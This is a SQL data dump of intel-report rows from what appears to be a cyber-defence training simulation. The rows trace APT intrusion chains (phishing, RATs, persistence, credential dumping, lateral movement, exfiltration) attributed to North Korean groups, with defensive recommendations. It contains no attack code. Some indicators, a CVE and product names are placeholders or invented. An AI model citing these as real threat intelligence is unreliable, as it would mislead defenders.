(782, 158, 1357, 2, 'Execution of Malicious Payload: AppleJeus Analysis', '### Context\nPost **Execution of Malicious Payload**, our investigation has identified the deployment of the AppleJeus malware variant. This variant uses a fake cryptocurrency application to execute its payload.\n\n### TTPs Observed\n- **Fake Cryptocurrency Application**: Disguised as legitimate software facilitating the Trojan\'s installation.\n- **Code Execution Techniques**: Utilizes DLL side-loading to evade detection.\n\n### Next Steps\nFocus on identifying persistence mechanisms to prevent the adversary from maintaining long-term access to compromised systems.', '2026-03-01 23:02:16'),
(783, 158, 1358, 3, 'Persistence Mechanisms Uncovered', '### Context\nIn response to **Establishing Persistence Mechanism**, we\'ve discovered that the adversary employs scheduled tasks and registry modifications to maintain persistence.\n\n### TTPs Observed\n- **Scheduled Tasks**: Regularly triggers the malicious payload to ensure execution even after system reboots.\n- **Registry Modifications**: Alters startup configurations to execute malware automatically.\n\n### Next Steps\nMonitor for lateral movement attempts to identify any expansion of adversary presence within the network.', '2026-03-01 23:02:16'),
(784, 158, 1359, 4, 'Lateral Movement: Network Propagation Analysis', '### Context\nFollowing the **Lateral Movement Detected** alert, analysis indicates the adversary utilizes credential dumping and stolen credentials for network propagation.\n\n### TTPs Observed\n- **Credential Dumping**: Utilizes tools like Mimikatz to extract login credentials.\n- **Remote Execution Tools**: Leverages legitimate tools such as PsExec for lateral movement.\n\n### Next Steps\nImplement strict data exfiltration monitoring to detect any unauthorized data transfers potentially leading to a breach.', '2026-03-01 23:02:16'),
(785, 158, 1360, 5, NULL, NULL, '2026-03-01 23:02:16'),
(786, 159, 1361, 1, 'Analysis of Malware Installation via Trojanized Trading App', '### Overview\nAfter the initial alert concerning the installation of the trojanized trading app, our analysis indicates that the app was disguised as a legitimate cryptocurrency trading platform.\n\n### Findings\n- **Application Name**: CryptoTradePro\n- **Distribution Method**: Spear-phishing emails targeting cryptocurrency enthusiasts\n- **Malware Type**: Custom-built Trojan\n\n### Impact\nThe malware facilitates unauthorized access to the user\'s device, setting the stage for further exploitation.\n\n### Next Steps\nMonitor for execution of any Remote Access Trojans (RAT) that may leverage this initial foothold.', '2026-03-01 23:02:30');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(787, 159, 1362, 2, 'Execution of Remote Access Trojan (RAT) Detected', '### Overview\nFollowing the initial access, a Remote Access Trojan (RAT) was executed, gaining control over compromised systems.\n\n### Findings\n- **RAT Identified**: RAT-X v2.4\n- **Capabilities**: Keylogging, Screen Capture, Command Execution\n- **Command and Control Servers**: Traced to multiple IPs in Eastern Europe\n\n### Impact\nThe RAT enables attackers to execute commands remotely, potentially leading to information theft and further system compromise.\n\n### Next Steps\nInvestigate potential persistence mechanisms, including credential theft or other tactics used to maintain access.', '2026-03-01 23:02:30'),
(788, 159, 1363, 3, 'Credential Theft Mechanism Uncovered', '### Overview\nUpon execution of the RAT, attackers have harvested credentials alongside conventional persistence mechanisms; stolen credentials let them regain access even if the RAT itself is removed.\n\n### Findings\n- **Tools Used**: Mimikatz for credential dumping\n- **Targeted Data**: Cryptocurrency wallet keys, Exchange login credentials\n- **Persistence Method**: Scheduled tasks and registry modifications\n\n### Impact\nCompromised credentials allow attackers to maintain access and potentially move laterally within networks.\n\n### Next Steps\nBegin monitoring for lateral movement using compromised accounts, reset every credential exposed on the affected hosts, and ensure defensive measures are in place.', '2026-03-01 23:02:30'),
(789, 159, 1364, 4, 'Lateral Movement and Account Compromise', '### Overview\nAttackers have begun using compromised accounts to move laterally within targeted organizations.\n\n### Findings\n- **Movement Technique**: Pass-the-Hash and Pass-the-Ticket\n- **Compromised Accounts**: Admin-level accounts in several cryptocurrency exchanges\n- **New Objectives**: Access to internal financial systems\n\n### Impact\nIncreased risk of significant data exfiltration and asset theft.\n\n### Next Steps\nFocus on detecting and preventing exfiltration of cryptocurrency assets, while working to secure all compromised accounts.', '2026-03-01 23:02:30'),
(790, 159, 1365, 5, NULL, NULL, '2026-03-01 23:02:30'),
(791, 160, 1366, 1, 'Investigation of Suspicious LinkedIn Profile', '# Investigation of Suspicious LinkedIn Profile\n\n**Background:**\nFollowing the alert of a suspicious LinkedIn connection request, an investigation was launched to analyze the profile of the individual claiming to be a recruiter for an aerospace company.\n\n**Findings:**\n- The LinkedIn profile was recently created with limited connections and activity.\n- The profile picture was identified as a stock image, commonly used in fraudulent schemes.\n- Past employment history was inconsistent and unverifiable.\n\n**Implications:**\nThe profile exhibits classic signs of a social engineering attempt, likely aimed at targeting aerospace engineers with fake job offers.\n\n**Next Steps:**\nMonitor for any subsequent communication attempts from this profile or similar entities.', '2026-03-01 23:03:23'),
(792, 160, 1367, 2, 'Analysis of Malicious Email Attachment', '# Analysis of Malicious Email Attachment\n\n**Background:**\nA follow-up email was sent by the suspicious LinkedIn profile, containing an attachment that purportedly included a job description.\n\n**Findings:**\n- The attachment was a disguised executable file with a double extension (e.g., .pdf.exe), relying on the OS hiding known extensions so it displays as a PDF.\n- Analysis revealed that, when executed, the file acts as a downloader and retrieves additional malware. Note that a .pdf.exe file is a native executable, not a macro-bearing document, so macro-blocking controls alone would not have stopped it.\n- The payload was identified as a Remote Access Trojan (RAT), aimed at establishing unauthorized access to the victim\'s system.\n\n**Implications:**\nThis attachment is designed to compromise the system of aerospace engineers, granting attackers remote control capabilities.\n\n**Next Steps:**\nStrengthen email filtering protocols (block executable attachments and double-extension names at the gateway) and educate users about recognizing and handling phishing attempts.', '2026-03-01 23:03:23'),
(793, 160, 1368, 3, 'Detection of Remote Access Trojan (RAT) Activity', '# Detection of Remote Access Trojan (RAT) Activity\n\n**Background:**\nFollowing the execution of the malicious attachment, network monitoring tools detected suspicious activity indicative of a RAT.\n\n**Findings:**\n- Unusual outbound traffic was observed, consistent with RAT communication patterns.\n- Multiple attempts to escalate privileges were detected, signaling the RAT\'s efforts to gain deeper access.\n- The malware established persistence by modifying startup entries.\n\n**Implications:**\nThe RAT poses a significant threat, capable of remote control, data theft, and lateral network movement.\n\n**Next Steps:**\nInitiate containment and eradication procedures, and perform a comprehensive network sweep to identify additional infections.', '2026-03-01 23:03:23'),
(794, 160, 1369, 4, 'Lateral Movement and Network Segment Compromise', '# Lateral Movement and Network Segment Compromise\n\n**Background:**\nPost-RAT deployment, there were signs of lateral movement within the network, targeting secure segments.\n\n**Findings:**\n- Unauthorized access attempts were identified on systems within the secure network segments.\n- Credentials were harvested from compromised machines, facilitating the lateral spread.\n- Systems housing sensitive aerospace data were specifically targeted.\n\n**Implications:**\nThe adversary\'s ability to navigate the network poses a substantial risk to sensitive data and operational security.\n\n**Next Steps:**\nImplement network segmentation and tighten access controls to prevent further lateral movement.', '2026-03-01 23:03:23'),
(795, 160, 1370, 5, 'Data Exfiltration Attempt and Command & Control Link', '# Data Exfiltration Attempt and Command & Control Link\n\n**Background:**\nAn attempt to exfiltrate sensitive data was detected, coinciding with communication to known North Korean IP addresses.\n\n**Findings:**\n- Data packets were identified leaving the network, disguised as normal web traffic.\n- The destination IPs are associated with previous Lazarus Group activities.\n- Command and Control (C2) instructions were traced back to these IPs, confirming the link.\n\n**Implications:**\nThe operation is consistent with Lazarus Group\'s tactics, techniques, and procedures (TTPs), posing a serious threat to national aerospace security.\n\n**Next Steps:**\nCoordinate with national cybersecurity agencies for a comprehensive response and consider legal actions against identified adversarial entities.', '2026-03-01 23:03:23'),
(796, 160, 1371, 6, NULL, NULL, '2026-03-01 23:03:23'),
(797, 161, 1443, 1, 'Analysis of Spear Phishing Tactics', '### Overview\nFollowing the detection of initial access through spear phishing, this report delves into the tactics employed by the Lazarus Group to compromise targets within the aerospace sector.\n\n### Key Findings\n- **Target Identification:** The Lazarus Group meticulously selected high-value targets within aerospace companies, focusing on those with access to sensitive information.\n- **Phishing Content:** Emails often mimicked legitimate aerospace industry communications, utilizing industry-specific jargon and references to ongoing projects.\n- **Attachments:** Malicious attachments, often disguised as PDF files related to aerospace contracts or technical documents, were the primary vehicle for malware delivery.\n\n### Implications\nThe use of highly targeted spear phishing attacks underscores the need for robust email filtering and user training to recognize and report suspicious communications.\n\n### Next Steps\nPrepare for the potential execution of custom Mac malware, which is likely embedded within the malicious attachments.', '2026-03-03 22:01:10'),
(798, 161, 1444, 2, 'Unveiling Custom Mac Malware Deployment', '### Overview\nThis report provides an in-depth analysis of the custom Mac malware deployed by the Lazarus Group, following successful spear phishing attacks.\n\n### Key Features of the Malware\n- **Stealth:** The malware employs advanced obfuscation techniques to evade detection by standard antivirus solutions.\n- **Capabilities:** It is designed to exfiltrate sensitive data, including aerospace project files, and can perform keylogging and screenshot captures.\n- **Command and Control:** The malware communicates with C2 servers using encrypted channels, making traffic analysis challenging.\n\n### Indicators of Compromise\n- **File Hashes:** The malware variants have specific SHA-256 hashes, critical for identifying infected systems.\n- **Network Traffic:** Unusual outbound traffic patterns to known malicious IP addresses have been observed.\n\n### Implications\nThe deployment of this sophisticated malware signifies a high level of threat actor motivation and capability, necessitating immediate containment and remediation measures.\n\n### Next Steps\nFocus will shift to identifying how the malware establishes persistence and begins lateral movement within compromised networks.', '2026-03-03 22:01:10'),
(799, 161, 1445, 3, NULL, NULL, '2026-03-03 22:01:10'),
(800, 162, 1446, 1, 'Analysis of Suspicious App Download', '### Overview\nThe initial alert was triggered by the download of a suspicious application. This application is believed to be a Trojanized version of a legitimate crypto trading app, potentially linked to the Lazarus Group.\n\n### Key Findings\n- **Origin**: The download was traced back to a known phishing domain masquerading as a popular crypto exchange.\n- **File Analysis**: Initial inspection suggests the presence of obfuscated code, likely designed to evade detection.\n\n### Next Steps\n- Conduct a deeper analysis of the application\'s behavior post-installation to identify any unusual scripts or processes triggered by the app. This will help us prepare for potential execution attempts.', '2026-03-03 22:03:46'),
(801, 162, 1447, 2, 'Detection of Unknown Script Execution', '### Overview\nFollowing the download, several unknown scripts were executed on the target system. These scripts appear to facilitate the initial stages of the attack.\n\n### Key Findings\n- **Script Behavior**: The scripts initiated a series of system reconnaissance commands, likely gathering information about the macOS environment.\n- **Indicators of Compromise (IoCs)**: Several newly created files and modifications to existing system files were detected.\n\n### Next Steps\n- Investigate the method used to establish persistence within the system. This will involve monitoring for any changes in startup items or scheduled tasks.', '2026-03-03 22:03:46'),
(802, 162, 1448, 3, 'Persistence Mechanism Established', '### Overview\nThe adversary has successfully established a persistence mechanism, ensuring their continued access to the compromised system.\n\n### Key Findings\n- **Persistence Techniques**: Modifications to macOS launch agents and the creation of new login items were observed.\n- **Potential Backdoors**: Evidence suggests the installation of a backdoor to allow remote access even if the trojanized app is removed.\n\n### Next Steps\n- Focus on identifying any lateral movement activities originating from the compromised system. This will involve monitoring network traffic for unusual patterns and potential attempts to access other systems.', '2026-03-03 22:03:46'),
(803, 162, 1449, 4, 'Unauthorized Lateral Movement Attempt', '### Overview\nAn attempt was made to move laterally across the network from the compromised system. This indicates a potential expansion of the attack.\n\n### Key Findings\n- **Target Systems**: The attack targeted systems within the same network segment, focusing on those with admin privileges.\n- **Methods Used**: Exploitation of known vulnerabilities in outdated software versions was attempted.\n\n### Next Steps\n- Immediate containment measures are required to prevent sensitive data exfiltration. Enhanced monitoring of outbound traffic is necessary to detect any data transfers.', '2026-03-03 22:03:46'),
(804, 162, 1450, 5, NULL, NULL, '2026-03-03 22:03:46'),
(805, 163, 1451, 1, NULL, NULL, '2026-03-07 00:50:13'),
(806, 163, 1452, 2, 'Malicious Document Execution Unveiled', '## Context\nAfter detecting the spear-phishing email, further analysis revealed that the email contained a link to a malicious document disguised as an official communication from a well-known financial institution.\n\n## Insight\nThe document exploited a known vulnerability in an outdated version of a popular document viewer installed on many systems within the targeted cryptocurrency exchanges. Once opened, it initiated the download and execution of a payload designed to establish a foothold in the network.\n\n## Next Steps\nTeams should implement immediate patches to all document viewers and monitor for any signs of unauthorized document execution across the network.', '2026-03-07 00:50:13'),
(807, 163, 1453, 3, 'Credential Harvesting via Password Manager Exploit', '## Context\nFollowing the execution of the malicious document, an alert was triggered indicating potential credential harvesting activities.\n\n## Insight\nThe malware deployed targeted vulnerabilities in popular password managers used within the exchanges. By exploiting these weaknesses, the attackers were able to extract stored credentials from compromised systems, gaining access to sensitive accounts.\n\n## Recommendations\nUrgently review and update password manager software configurations, enforce multi-factor authentication, and conduct a comprehensive audit of access logs to identify unauthorized access attempts.', '2026-03-07 00:50:13'),
(808, 163, 1454, 4, 'Lateral Movement Detected Within Internal Network', '## Context\nPost credential harvesting, the attackers utilized the compromised credentials to move laterally across the internal network of the cryptocurrency exchanges.\n\n## Insight\nUsing legitimate credentials, the threat actors accessed additional systems and expanded their footprint. This movement was aimed at identifying systems with higher privileges or direct access to cryptocurrency wallets.\n\n## Mitigation\nImmediate containment measures should be enacted, including isolating affected systems, revoking all compromised credentials, and conducting a thorough investigation to map the extent of the penetration.', '2026-03-07 00:50:13'),
(809, 163, 1455, 5, 'Data Exfiltration Attempt Thwarted', '## Context\nThe culmination of the operation was an attempt to exfiltrate valuable data, including private keys and sensitive financial information, from the compromised exchanges.\n\n## Insight\nThe data exfiltration attempt was detected through anomaly detection systems monitoring unusual outbound traffic patterns. This activity suggested the use of encrypted channels to transfer data to external servers controlled by the attackers.\n\n## Actionable Steps\nEnhance network monitoring capabilities, deploy data loss prevention solutions, and conduct regular security drills to improve response times. Additionally, work with law enforcement to track and take down attacker infrastructure.', '2026-03-07 00:50:13'),
(810, 164, 1456, 1, 'Initial Access Analysis', '## Overview\nAfter the detection of suspicious access to the transaction switch, further analysis revealed that the unauthorized activity likely originated from a compromised employee account. The account was used to exploit a vulnerability in the switch\'s authentication module.\n\n## Technical Details\n- **Vulnerability Exploited:** A weak password policy enabled brute force attacks.\n- **Entry Point:** External IP address traced to a location in Eastern Europe.\n- **Tools Used:** Custom scripts were deployed to maintain low-profile access.\n\n## Recommendations\n- **Immediate Action:** Revise and enforce a robust password policy.\n- **Monitoring:** Enhance logging on transaction switch access points.\n\n## Next Steps\nPrepare for potential malicious code execution, as APT38 typically follows initial access with malware deployment.', '2026-03-07 00:50:56'),
(811, 164, 1457, 2, 'Execution Phase Insights', '## Overview\nFollowing the detection of malicious code execution, further investigation identified the deployment of a sophisticated malware variant designed to manipulate transaction records.\n\n## Technical Details\n- **Malware Type:** Custom Trojan with capabilities to intercept and alter transaction data.\n- **Execution Method:** The malware was executed using a PowerShell script embedded in an email attachment.\n- **Indicators of Compromise (IoCs):**\n  - Hash (MD5; prefer SHA-256 when matching or blocking in production tooling): `d4f7a9e2b8c4e3d5e8a9712b5f4c8b9f`\n  - Command and Control (C2) Server: `maliciousserver.com`\n\n## Recommendations\n- **Immediate Action:** Isolate infected systems and perform a thorough forensic analysis.\n- **Monitoring:** Increase network traffic analysis for signs of unauthorized data alteration.\n\n## Next Steps\nAnticipate efforts to establish persistence as APT38 aims to maintain long-term access.', '2026-03-07 00:50:56'),
(812, 164, 1458, 3, 'Establishing Persistent Access', '## Overview\nAPT38 has initiated steps to establish persistent access within the financial institution\'s systems. This phase involves deploying backdoors and exploiting existing vulnerabilities to ensure continued access.\n\n## Technical Details\n- **Backdoor Tools:** The deployment of a RAT (Remote Access Trojan) was confirmed, enabling remote access and control.\n- **Persistent Mechanisms:** Registry keys were modified to ensure malware execution upon system reboot.\n- **Exploited Vulnerabilities:** A known local privilege-escalation vulnerability was leveraged. The identifier CVE-2022-1234 used in this training scenario is a placeholder, not a real advisory; do not use it for lookups or patch prioritization.\n\n## Recommendations\n- **Immediate Action:** Conduct a comprehensive vulnerability assessment and patch identified weaknesses.\n- **Monitoring:** Implement continuous endpoint detection and response (EDR) solutions.\n\n## Next Steps\nPrepare for lateral movement activities as APT38 coordinates with mules to activate the network for cash-out operations.', '2026-03-07 00:50:56'),
(813, 164, 1459, 4, 'Coordinated Mule Network Activation', '## Overview\nAPT38 is activating its mule network to facilitate the coordinated withdrawal of funds from compromised ATMs. This stage involves lateral movement within the network to access ATM management systems.\n\n## Technical Details\n- **Lateral Movement Technique:** Credential dumping and pass-the-hash attacks were utilized to move between systems.\n- **Mule Network:** Individuals across multiple regions in Africa and Asia have been identified as part of the network.\n- **ATM Targets:** Specific ATMs were preselected based on cash availability and location.\n\n## Recommendations\n- **Immediate Action:** Alert local law enforcement agencies and financial institutions to monitor and secure ATMs.\n- **Monitoring:** Deploy network segmentation to limit unauthorized lateral movement.\n\n## Next Steps\nPrepare for the exfiltration of stolen funds as APT38 finalizes its cash-out operations.', '2026-03-07 00:50:56'),
(814, 164, 1460, 5, NULL, NULL, '2026-03-07 00:50:56'),
(815, 165, 1461, 1, 'Assessment of Initial Access via Spear Phishing Campaign', '# Overview\nThe initial access was gained through a well-coordinated spear phishing campaign. This attack involved highly targeted emails containing malicious attachments or links, which were designed to compromise Sony Pictures employees\' credentials.\n\n## Insights into the Methodology\n- **Target Selection:** Key personnel within Sony Pictures were targeted to maximize the impact of the phishing emails.\n- **Email Content:** The emails were crafted to appear as legitimate communications from trusted sources, leveraging social engineering tactics.\n\n## Prelude to Destructive Malware Deployment\nThe successful compromise of credentials via phishing set the stage for the next phase of the attack: the deployment of destructive malware. This malware would be instrumental in causing significant operational disruption and damage to Sony Pictures.', '2026-03-07 00:51:05'),
(816, 165, 1462, 2, 'Deployment of Destructive Malware and Its Implications', '# Overview\nFollowing the initial access via spear phishing, the attackers deployed destructive malware within Sony Pictures\' network. This malware, known for its destructive payload, was designed to erase data and cripple systems.\n\n## Details of the Malware Used\n- **Payload:** The malware was equipped with data-wiping capabilities aimed at rendering systems inoperable.\n- **Spread Mechanism:** Utilized network shares and legitimate admin tools to propagate within the network.\n\n## Importance of Establishing Backdoor Access\nWith the malware causing chaos, attackers sought to establish persistent access through backdoors. These backdoors would allow them to maintain control over the network even if initial access points were discovered and remediated.', '2026-03-07 00:51:05'),
(817, 165, 1463, 3, 'Establishing Backdoor Access for Persistence', '# Overview\nAfter the deployment of destructive malware, attackers established backdoor access to ensure ongoing control over the compromised network. This step was crucial for the attackers to maintain a foothold and evade detection.\n\n## Techniques Employed\n- **Remote Access Tools:** Utilized legitimate remote access tools to blend in with normal network activity.\n- **Creation of Rogue Accounts:** Created unauthorized accounts with elevated privileges to facilitate future access.\n\n## Strategic Move to Enable Lateral Movement\nThe establishment of persistent backdoor access paved the way for lateral movement within the network. This allowed attackers to explore the network infrastructure, identify valuable assets, and plan subsequent stages of the attack.', '2026-03-07 00:51:05'),
(818, 165, 1464, 4, 'Lateral Movement: Expanding Reach within the Network', '# Overview\nWith backdoor access secured, the attackers engaged in lateral movement to expand their reach across Sony Pictures\' network. The objective was to find and compromise additional systems, thereby increasing their control and access to sensitive data.\n\n## Techniques for Network Propagation\n- **Credential Harvesting:** Exploited stolen or weak credentials to access additional systems.\n- **Use of Admin Tools:** Leveraged legitimate administrative tools to avoid detection while moving laterally.\n\n## Prelude to Data Exfiltration\nThe expanded reach within the network set the groundwork for data exfiltration. At this stage, attackers were well-positioned to identify, access, and extract sensitive data from Sony Pictures’ network, leading to the eventual data theft and leakage.', '2026-03-07 00:51:05'),
(819, 165, 1465, 5, NULL, NULL, '2026-03-07 00:51:05'),
(820, 166, 1466, 1, 'Analysis of Spear Phishing Tactics', '# Analysis of Spear Phishing Tactics\n\n## Overview\nFollowing the initial spear phishing attack, further analysis reveals that the threat actors utilized highly targeted emails designed to mimic internal communications.\n\n## Key Findings\n- **Email Content:** Impersonated IT department notices with subject lines related to urgent security updates.\n- **Targets:** Employees with access to sensitive communication systems.\n- **Attachments:** Malicious PDF files containing embedded scripts.\n\n## Recommendations\n- Increase phishing awareness training for staff.\n- Implement more robust email filtering mechanisms.', '2026-03-10 17:44:09'),
(821, 166, 1467, 2, 'Malicious Payload Deployment Investigated', '# Malicious Payload Deployment Investigated\n\n## Overview\nAfter the deployment of the malicious payload, a deeper forensic analysis was conducted to understand the scope and mechanism of the malware.\n\n## Key Findings\n- **Payload:** Custom-developed malware designed to evade standard antivirus solutions.\n- **Execution Method:** Utilized PowerShell scripts for download and execution.\n- **Impact:** Initial access to non-critical systems to test deployment strategies.\n\n## Recommendations\n- Disable unnecessary PowerShell scripts.\n- Monitor system logs for unusual script execution activities.', '2026-03-10 17:44:09'),
(822, 166, 1468, 3, 'Backdoor Installation and Persistence Mechanisms', '# Backdoor Installation and Persistence Mechanisms\n\n## Overview\nSubsequent investigations reveal that the adversaries have established a persistent presence by installing backdoors on compromised systems.\n\n## Key Findings\n- **Backdoor Type:** Utilizes encrypted communication channels to command and control servers.\n- **Persistence Method:** Modifies registry entries and scheduled tasks to maintain access.\n\n## Recommendations\n- Conduct regular scans for unauthorized registry changes.\n- Implement stricter access controls to prevent unauthorized task scheduling.', '2026-03-10 17:44:09'),
(823, 166, 1469, 4, 'Lateral Movement and Wiretap System Compromise', '# Lateral Movement and Wiretap System Compromise\n\n## Overview\nThe attackers have moved laterally within the network, focusing on accessing wiretap systems by compromising credentials.\n\n## Key Findings\n- **Credentials Compromised:** Utilized phishing and brute force attacks to obtain administrator credentials.\n- **Targeted Systems:** Wiretap systems with access to sensitive communications.\n\n## Recommendations\n- Enforce multi-factor authentication (MFA) for all administrative accounts.\n- Regularly update and monitor credential access logs for suspicious activity.', '2026-03-10 17:44:09'),
(824, 166, 1470, 5, NULL, NULL, '2026-03-10 17:44:09'),
(825, 167, 1471, 1, 'Analysis of Initial Phishing Attack Vectors', '## Overview\nThe initial access point in the operation was established through a sophisticated phishing campaign targeting employees in the critical infrastructure and entertainment sectors. The emails were crafted with high-level social engineering tactics, impersonating trusted internal communication sources.\n\n## Key Findings\n- **Phishing Techniques**: Utilized spear-phishing emails with malicious attachments and links.\n- **Targets**: Focused on IT staff and executives to maximize access potential.\n- **Payload**: Dropped reconnaissance malware to scope the network for vulnerabilities.\n\n## Next Steps\nThis report sets the stage for understanding the deployment of the Destover wiper, which was facilitated by the initial breach obtained through these phishing attacks.', '2026-03-15 19:06:37'),
(826, 167, 1472, 2, 'Deployment and Impact of Destover Wiper', '## Overview\nFollowing the successful phishing campaign, Hidden Cobra deployed the Destover wiper across the compromised networks. This malware is designed to destroy data, disrupt operations, and cover tracks.\n\n## Key Findings\n- **Malware Characteristics**: Destover is characterized by its destructive nature, deleting and overwriting data.\n- **Impact**: Critical infrastructure systems experienced significant downtime, and data recovery efforts are ongoing.\n- **Detection**: Antivirus systems failed to identify Destover initially due to its obfuscation techniques.\n\n## Next Steps\nUnderstanding Destover\'s deployment helps us anticipate how Hidden Cobra establishes persistence through backdoor installations in the affected systems.', '2026-03-15 19:06:37'),
(827, 167, 1473, 3, 'Backdoor Installation and Persistence Mechanisms', '## Overview\nWith the execution of the Destover wiper, Hidden Cobra moved to establish persistence within compromised systems by installing backdoors.\n\n## Key Findings\n- **Backdoor Types**: Utilized custom malware variants to avoid detection by standard security measures.\n- **Persistence Techniques**: Implemented registry key modifications and scheduled tasks to ensure long-term access.\n- **Access Points**: Targeted servers and workstations with privileged access.\n\n## Next Steps\nThe establishment of backdoors allows Hidden Cobra to prepare for lateral movement within the network, specifically targeting financial systems for further exploitation.', '2026-03-15 19:06:37'),
(828, 167, 1474, 4, 'Lateral Movement and Financial System Reconnaissance', '## Overview\nArmed with backdoor access, Hidden Cobra initiated lateral movement strategies within the compromised networks, focusing on financial systems within the Turkish infrastructure.\n\n## Key Findings\n- **Techniques**: Employed credential dumping and pass-the-hash attacks to traverse networks.\n- **Targets**: Specifically targeted databases and financial records.\n- **Reconnaissance**: Conducted detailed mapping of financial system architecture to identify valuable data.\n\n## Next Steps\nThe reconnaissance phase sets the stage for data exfiltration, where sensitive financial information and strategic data will be extracted and utilized by Hidden Cobra.', '2026-03-15 19:06:37'),
(829, 167, 1475, 5, NULL, NULL, '2026-03-15 19:06:37'),
(830, 168, 1476, 1, 'Execution of Rising Sun Implant: Detailed Analysis', '### Overview\nAfter initial access was gained through spear phishing, our analysis has identified the execution of the **Rising Sun** implant. This implant is a sophisticated piece of malware designed to execute on compromised systems within the targeted sectors.\n\n### Technical Details\n- **Entry Vector**: Embedded malware in email attachments.\n- **Execution Method**: Uses PowerShell scripts to deploy.\n- **Features**: Capable of gathering system information, executing arbitrary commands, and establishing a command and control (C2) channel.\n\n### Next Steps\nPrepare for potential persistence mechanisms as the threat actor seeks to maintain access.', '2026-03-15 19:07:00'),
(831, 168, 1477, 2, 'Persistence Mechanism and Advanced Threat Actor Activity', '### Overview\nWith the Rising Sun implant executed, our monitoring has detected advanced threat actor activity aimed at establishing persistence within compromised networks.\n\n### Persistence Techniques\n- **Scheduled Tasks**: Creation of tasks to run malware at specified intervals.\n- **Registry Modifications**: Alterations to ensure malware execution at startup.\n\n### Threat Actor Tactics\nThe actor is employing obfuscation and encryption to hide their activities, indicating a high level of sophistication.\n\n### Recommendations\nIncrease monitoring on registry changes and scheduled tasks. Expect lateral movement attempts as the next phase.', '2026-03-15 19:07:00'),
(832, 168, 1478, 3, 'Lateral Movement: Credential Dumping Observed', '### Overview\nFollowing the establishment of persistence, the threat actor is now attempting lateral movement across the network, primarily through credential dumping.\n\n### Techniques Observed\n- **Mimikatz Usage**: Extraction of credentials from memory.\n- **Pass-the-Hash**: Using hashed credentials to authenticate.\n\n### Impact\nThis activity poses a significant risk as it can lead to further breaches within the network.\n\n### Mitigation\nImplement enhanced logging and monitoring of authentication processes. Prepare for potential data exfiltration attempts.', '2026-03-15 19:07:00'),
(833, 168, 1479, 4, 'Data Exfiltration: Sensitive Data Compromise', '### Overview\nThe final phase detected involves the exfiltration of sensitive data from compromised systems, indicating a critical breach.\n\n### Exfiltration Methods\n- **Encrypted Channels**: Use of HTTPS or VPN to transfer data.\n- **Steganography**: Embedding data within benign files.\n\n### Data Targeted\nThe exfiltrated data includes sensitive information from the defense, nuclear, and energy sectors.\n\n### Response\nImmediate incident response actions are required to contain the breach and mitigate data loss. Coordination with affected sectors is necessary for damage assessment and recovery.', '2026-03-15 19:07:00'),
(834, 168, 1480, 5, NULL, NULL, '2026-03-15 19:07:00'),
(835, 169, 1481, 1, 'Analysis of Spear Phishing Attempt', '# Analysis of Spear Phishing Attempt\n\n## Summary\nFollowing the detection of a spear phishing attempt targeting South Korean think tanks, further analysis reveals the use of malicious Hangul Word Processor (HWP) attachments.\n\n## Details\n- **Targeted Individuals**: Primarily senior researchers and analysts within the think tanks.\n- **Phishing Email Characteristics**: Emails appear to originate from legitimate sources, with subject lines related to ongoing political and economic discussions.\n- **Malicious Attachment**: The HWP file contains embedded scripts designed to exploit known vulnerabilities, leading to the execution of GoldDragon malware.\n\n## Recommendations\n- Implement email filtering solutions to detect and quarantine similar phishing attempts.\n- Educate staff on recognizing phishing emails and avoiding opening suspicious attachments.', '2026-03-15 19:07:24'),
(836, 169, 1482, 2, 'Execution of GoldDragon Malware', '# Execution of GoldDragon Malware\n\n## Overview\nUpon successful exploitation of the HWP vulnerability, GoldDragon malware was executed on several targeted systems.\n\n## Technical Analysis\n- **Malware Capabilities**: GoldDragon is known for its ability to perform reconnaissance, gather system information, and facilitate further compromise.\n- **Initial Actions**: The malware first disables security features and gathers system-specific data to tailor its activities.\n\n## Next Steps\nMonitoring for registry and system changes indicative of persistence mechanisms is advised. Analysts should prepare for potential modifications aimed at maintaining access.', '2026-03-15 19:07:24'),
(837, 169, 1483, 3, 'Persistence Mechanisms via Registry Modifications', '# Persistence Mechanisms via Registry Modifications\n\n## Persistence Tactics\nGoldDragon employs registry modifications to maintain persistence on compromised systems.\n\n## Identified Modifications\n- **Registry Keys Altered**: Identified changes in the Run keys to ensure malware execution upon system startup.\n- **Additional Modifications**: Creation of hidden scheduled tasks that trigger malware activities at regular intervals.\n\n## Recommendations\n- Conduct regular audits of registry settings and scheduled tasks.\n- Implement alerting for unauthorized changes to critical system configurations.', '2026-03-15 19:07:24'),
(838, 169, 1484, 4, 'Credential Dumping and Lateral Movement', '# Credential Dumping and Lateral Movement\n\n## Lateral Movement Strategy\nFollowing persistence, GoldDragon attempts to harvest credentials to enable lateral movement across the organization\'s network.\n\n## Techniques Observed\n- **Credential Dumping Tools**: Usage of tools such as Mimikatz to extract passwords and hashes from memory.\n- **Network Activity**: Increase in suspicious authentication attempts and lateral connections.\n\n## Defensive Measures\n- Implement multi-factor authentication (MFA) to hinder unauthorized access.\n- Monitor and review authentication logs for abnormal patterns.', '2026-03-15 19:07:25'),
(839, 169, 1485, 5, 'Data Aggregation and Exfiltration Preparation', '# Data Aggregation and Exfiltration Preparation\n\n## Preparation for Data Exfiltration\nGoldDragon begins aggregating sensitive data from compromised systems in preparation for exfiltration.\n\n## Data Categories Targeted\n- **Sensitive Documents**: Focus on strategic documents related to political and economic strategies.\n- **User Credentials**: Collection of user credentials for potential further exploitation.\n\n## Security Recommendations\n- Encrypt sensitive data at rest to prevent unauthorized access.\n- Regularly backup critical data and ensure integrity of the backups.', '2026-03-15 19:07:25'),
(840, 169, 1486, 6, NULL, NULL, '2026-03-15 19:07:25'),
(841, 170, 1487, 1, 'Malicious Document Execution Uncovered: The Next Step in Kimsuky\'s Scheme', '# Malicious Document Execution Uncovered\n\n## Context:\nFollowing the suspicious interview request, Kimsuky actors have been observed sending malicious documents disguised as legitimate files pertinent to the fake interview.\n\n## How It Works:\n- **Malware Deployment**: Upon opening, these documents execute hidden scripts that install malware on the victim\'s system.\n- **Techniques Used**: The documents often exploit known vulnerabilities in document viewers (e.g., Microsoft Word, PDF readers) to execute malicious code.\n- **Objective**: Gain initial access to the victim\'s device, setting the stage for further infiltration.\n\nStay vigilant for any unexpected document attachments, especially from unknown contacts claiming to be interviewers.', '2026-03-15 19:07:40'),
